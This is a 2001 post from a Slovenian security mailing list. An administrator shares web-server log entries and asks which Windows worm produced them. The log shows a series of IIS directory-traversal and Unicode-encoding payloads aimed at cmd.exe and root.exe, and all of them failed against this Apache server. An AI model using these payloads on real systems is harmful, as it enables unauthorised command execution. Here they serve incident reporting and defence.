cudna vsebina v httpd access log

Tomaz Zupan tomaz.zupan at orpo.si
Tue Oct 2 09:58:30 CEST 2001 

Pozdravljeni,

Tole sem nasel v logu. Predvidevamda je crv namenjen na Windowse. Kako lahko
ugotovim kateri in kaj lahko ukrenem glede tega? Adresa naj bi bila iz ene
egiptovske univerze.

LP, Tomaž Zupan
Administrator
ORPO,d.o.o.,Kranj

-------------- next part --------------
195.246.41.20 - - [01/Oct/2001:12:35:36 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:41 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:43 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:48 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:01 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:09 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:13 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:15 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:36 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:41 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:43 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:44 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

More information about the lugos-sec mailing list